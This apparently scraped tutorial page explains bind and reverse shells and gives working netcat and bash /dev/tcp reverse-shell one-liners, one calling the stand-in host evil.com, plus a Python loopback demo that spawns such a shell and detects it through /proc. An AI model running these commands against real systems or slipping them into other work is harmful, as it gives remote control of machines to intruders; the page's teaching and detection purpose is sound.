Create a reverse shell using netcat or bash to execute commands on a remote host

Source: Internet
Author: User

A reverse shell is a technique for running shell commands on a remote machine that becomes useful when the remote machine sits behind something that blocks inbound connections, such as a firewall or NAT. You might ask, "can't a normal shell or a plain SSH session do that?" No: both require you to connect in to the remote host, which is exactly what the firewall prevents. A reverse shell turns the direction around and has the remote host connect out to you. Many people online confuse a normal (bind) shell with a reverse shell, so let's pin down both concepts before going further.

Reverse shell

A reverse shell works by having the remote host connect back to a listener on your machine and attach a shell to that connection, instead of binding the shell to a port on the remote host. Inbound connections to an arbitrary port are blocked in many environments, while outbound connections usually are not. The shell runs with the privileges of the user who launched it, so it gives you root on the remote server only if that user was root.

Bind Shell

A bind shell binds a shell (bash, for example) to a port on the local machine so that anyone who can reach that port over the network can send it commands.

Reverse shells are also a standard tool of attackers: after breaking into a server they plant a reverse shell so that they can easily get back into that machine later. I'm sure you won't use it for that kind of thing; use the techniques below only on systems you are authorized to test.
Environment requirements

A remote UNIX host that you already have a shell on
netcat installed (for the netcat variant; the bash variant needs only bash built with /dev/tcp support)

Using netcat to implement a reverse shell

Once you have a shell on the remote host, the following command sends a shell back to your machine (your machine must already be listening, see below):

nc -c /bin/sh <your ip> <a port that the firewall does not block>

The -c option (or -e /bin/sh in traditional netcat) hands the connection to a program. Many distributions ship the OpenBSD netcat, which has neither option; in that case you can pipe a shell through netcat instead. A bare "/bin/sh | nc ..." only carries the shell's output one way, so a named pipe is needed to feed what comes back from netcat into the shell's stdin:

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your ip> <a port that is not blocked> > /tmp/f

Then, on your own machine, listen for the incoming connection (start the listener before running the command on the remote host):

nc -l -p <same port> -vvv

(This is the traditional netcat syntax; the OpenBSD netcat also accepts nc -lvvv <same port>.)

Implementing a reverse shell with bash

This technique is used when there is no netcat on the remote machine, or when you want to leave as little behind as possible: no extra binary is needed, only bash's built-in /dev/tcp redirections (bash must have been compiled with network redirection support, which most distributions enable).

Listener on your machine:

nc -l -p <a port that is not blocked> -vvv

On the remote host, first open a new file descriptor (5 here) on a TCP connection to your listener; bash's /dev/tcp/<host>/<port> pseudo-path performs the connect. Because the descriptor is opened read-write (<>), we can both read commands from it and write results back to it (evil.com stands for the host your listener runs on):

exec 5<>/dev/tcp/evil.com/<the same port>
cat <&5 | while read line; do $line 2>&5 >&5; done

Each line received over the connection is word-split and run as a simple command, with its stdout and stderr sent back over fd 5. Because no shell parses the line, pipes, quoting, redirections and builtins such as cd will not behave as expected.

or a more complete reverse shell, which hands the connection to a real sh as its stdin, stdout and stderr:

exec 196<>/dev/tcp/<your ip>/<the same port>; sh <&196 >&196 2>&196


Once the connection is up, anything you type into the netcat listener is executed on the remote host and the output comes back over the same connection.
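The following is an added example, not code from the original article, that wires the two halves together on the loopback interface so the whole exchange can be run offline: a Python socket stands in for the nc -l -p <port> -vvv listener, and a bash child process runs the fd-196 /dev/tcp redirection from above against 127.0.0.1. It also shows the defender's side of the same trick: while the shell is connected, fds 0, 1 and 2 of the sh process resolve to socket:[inode] in /proc, and that inode maps back to the listener's address in /proc/net/tcp, which is how a reverse shell is spotted on a host. Assumptions: Linux, bash built with network redirections (the usual distribution default), a readable /proc; the command strings and the END_MARKER sentinel are made up for the demo.

```python
"""Loopback demo of the bash /dev/tcp reverse shell, plus the host-side check.
Added example, not code from the original article. A Python socket stands in for the
`nc -l -p <port> -vvv` listener; a bash child runs the article's fd-196 redirection
against 127.0.0.1. Assumes Linux, bash with /dev/tcp support, readable /proc."""
import os
import shutil
import socket
import struct
import subprocess

END_MARKER = "__RS_DONE__"  # constructed sentinel marking the end of command output

def bash_available() -> bool:
    """True if a bash binary is on PATH; the demo cannot run without one."""
    return shutil.which("bash") is not None

def start_listener(host="127.0.0.1", port=0, timeout=10.0) -> socket.socket:
    """Bind a TCP listener like `nc -l -p <port>`; the timeout turns a bash without
    /dev/tcp support into a loud failure instead of a hang (port 0: kernel picks)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    srv.settimeout(timeout)
    return srv

def launch_victim(host: str, port: int) -> subprocess.Popen:
    """fd 196 becomes the TCP socket and sh inherits it as stdin/stdout/stderr;
    `exec sh` keeps the pid stable so the same process can be inspected in /proc."""
    one_liner = f"exec 196<>/dev/tcp/{host}/{port}; exec sh <&196 >&196 2>&196"
    return subprocess.Popen(["bash", "-c", one_liner], stdin=subprocess.DEVNULL,
                            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

def socket_fds(pid: int) -> dict:
    """{fd: socket inode} for every socket pid holds. A shell whose fds 0/1/2 are
    sockets rather than a tty or pipe is the classic reverse-shell tell."""
    found = {}
    try:
        fd_dir = f"/proc/{pid}/fd"
        for name in os.listdir(fd_dir):
            try:
                target = os.readlink(os.path.join(fd_dir, name))
            except OSError:
                continue  # fd closed between listdir and readlink
            if target.startswith("socket:[") and target.endswith("]"):
                found[int(name)] = int(target[len("socket:["):-1])
    except OSError:
        pass  # no /proc or not permitted: caller sees an empty dict
    return found

def tcp_peer_for_inode(inode: int):
    """Map a socket inode to its remote (ip, port) via /proc/net/tcp, or None."""
    try:
        with open("/proc/net/tcp") as fh:
            next(fh)  # header row
            for line in fh:
                cols = line.split()
                if int(cols[9]) == inode:
                    ip_hex, port_hex = cols[2].split(":")
                    # /proc prints the IPv4 address as a native-order 32-bit word
                    return socket.inet_ntoa(struct.pack("=I", int(ip_hex, 16))), int(port_hex, 16)
    except (OSError, StopIteration):
        pass
    return None

def run_demo(command: str = "id -u; uname -s") -> dict:
    """Accept the connecting shell, run `command` through it, inspect its fds while
    it is still connected, then tell it to exit. Returns what was observed."""
    srv = start_listener()
    host, port = srv.getsockname()
    victim = launch_victim(host, port)
    conn = None
    try:
        conn, _ = srv.accept()
        conn.settimeout(10.0)
        conn.sendall(f"{command}; echo {END_MARKER}\n".encode())
        buf = b""
        while END_MARKER.encode() not in buf:
            chunk = conn.recv(4096)
            if not chunk:
                break  # shell died before finishing
            buf += chunk
        fds = socket_fds(victim.pid)  # defender's view while the shell is connected
        peers = {fd: tcp_peer_for_inode(ino) for fd, ino in fds.items()}
        conn.sendall(b"exit\n")
        victim.wait(timeout=10)
    finally:
        if conn is not None:
            conn.close()
        srv.close()
        if victim.poll() is None:
            victim.kill()
    output = buf.decode(errors="replace").replace(END_MARKER + "\n", "")
    return {"listener_port": port, "output": output, "socket_fds": fds, "peers": peers}

if __name__ == "__main__":
    r = run_demo()
    print(r["output"].strip(), {fd: r["peers"][fd] for fd in sorted(r["socket_fds"])})
```

Running the file prints the command output received over the connection and, for each socket fd of the connected sh (0, 1, 2 and 196 all point at the same socket), the remote address it is connected to, which is the listener's port. The same two lookups, /proc/<pid>/fd followed by /proc/net/tcp, are what a host-based check does to flag a shell whose standard streams are network sockets.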

The content of this page comes from the Internet and does not represent Alibaba Cloud's opinion; products and services mentioned on the page have no relationship with Alibaba Cloud. If the content of the page is confusing, please write us an email and we will handle the problem within 5 days of receiving it.